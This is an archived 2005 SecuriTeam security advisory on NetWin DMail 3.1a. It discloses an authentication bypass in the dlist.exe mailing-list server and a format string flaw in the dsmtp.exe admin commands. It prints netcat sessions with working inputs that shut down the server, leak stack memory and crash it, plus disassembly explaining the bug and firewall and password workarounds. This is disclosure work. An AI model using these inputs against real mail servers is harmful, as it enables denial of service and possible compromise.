[NT] NetWin DMail Authentication Bypass (dlist.exe) and Format String (dsmtp.exe)

• Previous message: SecuriTeam: "[NEWS] FishCart SQL Injection and Cross Site Scripting Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 4 May 2005 19:27:04 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  NetWin DMail Authentication Bypass (dlist.exe) and Format String
(dsmtp.exe)
------------------------------------------------------------------------

SUMMARY

" <http://netwinsite.com/dmail_first.htm> NetWin DMail is an easy to
install, high performance, reliable and scalable mail server. It can
either be used as a small personal mail server or as a 10 Million user ISP
mail system. Flexible authentication modules allow you to plug DMail into
any existing user database. It includes many SPAM prevention mechanisms
and the ability to run any of several virus checking packages of your
choice."

Authentication bypassing (dlist.exe) and format string (dsmtp.exe)
vulnerabilities were discovered in DMail's mail server, exploiting these
vulnerabilities allows a malicious attacker to gain full control over the
system.

DETAILS

Vulnerable Systems:
 * DMail version 3.1a NT (dm31b_win32.exe)

The NetWin DMail server package consists of the SMTP server (dsmtp.exe),
the POP server (dpop.exe), the mailing list server (dlist.exe), and the
GUI management tool (dmadmin.exe). The GUI management tool (dmadmin.exe)
allows the administrator to manage the three servers and to retrieve live
logs from them. dmadmin.exe sends administrative commands to each of these
three servers via their respective listening ports. dmadmin.exe must
authenticate to these servers using an administrative password (or
password hash) when sending the administrative commands.

dlist.exe Authentication Bypass Vulnerability:
DList is the mailing list server that is part of the DMail package. DList
listens on port 7111 and accepts administrative commands from dmadmin.exe
(the GUI management tool). These administrative commands are issued by
dmadmin.exe to receive logs from the DList server and/or to shutdown the
server.

When issuing an administrative command, dmadmin.exe must authenticate to
the DList server using a numeric hash of the administrative password.
However, it is possible to bypass this authentication to issue sendlog or
shutdown commands to the DList server without knowing the password hash. A
remote attacker may connect to the mailing list server on port 7111,
bypass its authentication, and shutdown it down, or receive logs from it.

The following illustrates this.
C:\> nc 192.168.2.104 7111
hash 10687
password 234343 // suppose we do not know the password hash
err Password wrong
shutdown 234343 // we're not authenticated so can't shutdown down the
server
error NOT AUTHORIZED YET
shutdown 234343
error NOT AUTHORIZED YET
sendlog 234343 // sendlog command has a bug that will cause us to be
authenticated as long as the atoi value of the hash we sent is not 0 and
1.
ok Dlist 3.1a, loglevel info, sending log to this channel
log 29 01:14:02 info: Process request on chan 3 - done
shutdown 234343 // now we can shutdown the server
log 29 01:14:14 info: Process request on chan 1

The problem lies in the _cmd_sendlog function as shown below. The code
highlighted in red messes up the computed hash and the use of JNZ means
that the user is considered to be "authenticated" as long as the atoi
value of the supplied hash is not 0 and 1.

0041104F CALL dlist._tellnews_pass // Retrieve admin password
00411054 PUSH EAX
00411055 CALL dlist._lib_hash // Compute the hash of admin password
0041105A ADD ESP,8 // Hash in EAX
0041105D MOV ESI,EAX // Hash in ESI
0041105F NEG ESI
00411061 SBB ESI,ESI // ESI will be 0 or FFFFFFFF
00411063 INC ESI // ESI will be 1 or 0
00411064 MOV EDX,DWORD PTR SS:[EBP+C]
00411067 PUSH EDX // Pointer to user supplied hash
00411068 CALL dlist._atoi // Convert to integer
0041106D ADD ESP,4
00411070 CMP ESI,EAX // Compare ESI (1 or 0) with atoi value of user
supplied hash
00411072 JNZ SHORT dlist.004110D5 // i.e. Authenticated if
atoi(user_supplied_hash) != 0 and != 1
00411074 PUSH dlist.0043339C // Arg2 = 0043339C ASCII "err Password
incorrect"
00411079 MOV EAX,DWORD PTR SS:[EBP+8]
0041107C MOV ECX,DWORD PTR DS:[EAX*4+459590]
00411083 PUSH ECX // Arg1
00411084 CALL dlist._tcp_printf // Reply "err Password incorrect" to user
..
..
..
004110D5 MOV EDX,DWORD PTR SS:[EBP+8]
004110D8 MOV DWORD PTR DS:[EDX*4+459634],1 // Set "Authenticated" to TRUE
004110E3 MOV EAX,DWORD PTR SS:[EBP+8]
004110E6 MOV DWORD PTR DS:[EAX*4+4595E0],1
004110F1 CALL dlist._log_getlvl

// Since output of _lib_hash is usually not 0, CF will be set by NEG ESI.
Hence, "SBB ESI, ESI" will be FFFFFFFF, and
// INC ESI will give 0. i.e. user will be authenticated as long as
atoi(user_supplied_hash) != 0.

dsmtp.exe Admin Commands Format String Vulnerability.
DSmtp is the SMTP server of the DMail package. DSmtp listens on port 25
for SMTP commands and can accept admin commands from dmadmin.exe on the
same port. These administrative commands allow dmadmin.exe to receive logs
from the DSmtp server, shutdown the server, and/or to request specific
information from the server. Format string vulnerability exists in several
administrative commands as shown below. However, this vulnerability may
only be exploited if the administrative password is known.

C:\> nc 192.168.2.104 25
220 xxxxxxx DSMTP ESMTP Mail Server
xtellmail 123456 %.8X%.8X // incorrect admin password
-ERR Invalid password, command rejected
xtellmail 123123 test // supply an invalid admin command with correct
admin password (123123)
-ERR Unknown tellsmtp command (test)
xtellmail 123123 %.8X%.8X%.8X%.8X // supply a format string as the admin
command
-ERR Unknown tellsmtp command (302F3932313020333A33343A20203835) //
contents of stack printed
xtellmail 123123 %n%n%n%n%n // this will cause a crash
..CRASH.....

C:\> nc 192.168.2.104 25
220 xxxxxxx DSMTP ESMTP Mail Server
xtellmail 123123 encode test
+DATA encoding test gives dGVzdAAA
+OK Done
xtellmail 123123 encode %.8X%.8X%.8X%.8X
+DATA encoding 00000006001114440000000000000000 gives
JS44WCUuOFglLjhYJS44WAAA
+OK Done
xtellmail 123123 encode %n%n%n%n
..CRASH.....

This vulnerability is due to the unsafe use of the _vsnprintf function in
_xmsg(char *formatstr, ...) and _tcp_printf(arg1, char *formatstr, ...).
This is illustrated below.

_cmd_tellmail(arg1, arg2, arg3, arg4, arg5)
{
 ...
 ...
 // unknown tellsmtp command
 _xmsg("-ERR Unknown tellsmtp command (%s)", "%n%n%n%n");
 ...
}

_xmsg(char *formatstr, ...)
{
 // formatStr is "-ERR Unknown tellsmpt command (%s)"
 // arglist points to "%n%n%n%n"
 
 _vsnprintf(buffer, count, formatstr, arglist);

 // buffer is now "-ERR Unknown tellsmtp command (%n%n%n%n)"
 _tcp_printf(arg, buffer);
}

_tcp_printf(arg1, char *formatstr, ...)
{
 // formatStr is "-ERR Unknown tellsmtp command (%n%n%n%n)"
 // arglist points to somewhere on stack

 _vsnprintf(buffer, count, formatstr, arglist);
}

Workaround:
1) Block port 7111 with your firewall
2) Set a strong administrative password

ADDITIONAL INFORMATION

The information has been provided by <mailto:chewkeong@security.org.sg>
Chew Keong TAN.
The original article can be found at:
<http://www.security.org.sg/vuln/dmail31a.html>
http://www.security.org.sg/vuln/dmail31a.html

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NEWS] FishCart SQL Injection and Cross Site Scripting Vulnerabilities"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]